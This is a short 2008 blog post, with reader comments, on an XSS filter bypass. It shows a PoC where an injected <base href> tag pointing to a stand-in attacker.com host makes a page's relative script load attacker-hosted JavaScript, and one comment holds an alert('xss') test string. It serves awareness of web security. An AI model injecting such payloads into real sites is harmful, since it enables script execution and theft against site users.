Bypass Anti XSS Filter : A Little Nice XSS Trick

On July 16, 2008, in Concept, Exploit, XSS Corner, by Zoiz

Sometimes when I develop web applications, I’ll feel not good if I am asked to allow HTML in user inputs / outputs. What scares me? XSS I think.

This morning I received an interesting email from webappsec.org mailing list. Amit Klein founds out that he can trigger a XSS without a <script> tag NOR inside ONE. Here is the PoC :

<html>

***XSS code may be embedded here***

<script src=”/foo/bar.js”></script>

</html>

The XSS is something like this :

<base href=”http://www.attacker.com/”>

And the attacker should put some JS on his host on the exact directory (ex : http://www.attacker.com/foo/bar.js). You know what happens next rite? :D

The coolest part of this XSS is it doesn’t even need a <script> tag or something like that. And for developers that uses / trusts blacklist approach (oranglist, greenlist, pinklist, or what ever you name it) that is usually targeting for “script”, this kind of attacks will surely bypass it.

Nice one Amit Klein ;)

So, what is the solution? Myself suggest you not to allow your users to use HTML :P

If you enjoyed this article, please consider sharing it!
Digg Delicious Digg

Tagged with:  

4 Responses to “Bypass Anti XSS Filter : A Little Nice XSS Trick”

  1. r3ck0rd says:
    July 22, 2008 at 6:20 pm

    or… I suggest using strip_tags? ;)

  2. qwerty says:
    August 2, 2008 at 10:09 am

    The href stuff need to be blacklisted. There are plenty of bypassing techniques use href tag to do it.

  3. test says:
    August 2, 2008 at 3:36 pm

    alert(‘xss’);

  4. Idoenk says:
    October 10, 2008 at 2:00 am

    There are so many way to do xss without using <script> tags.
    ref: rsnake’s xss cheat sheet list :D
    ergh, hell yeah just disable user to use html

Leave a Reply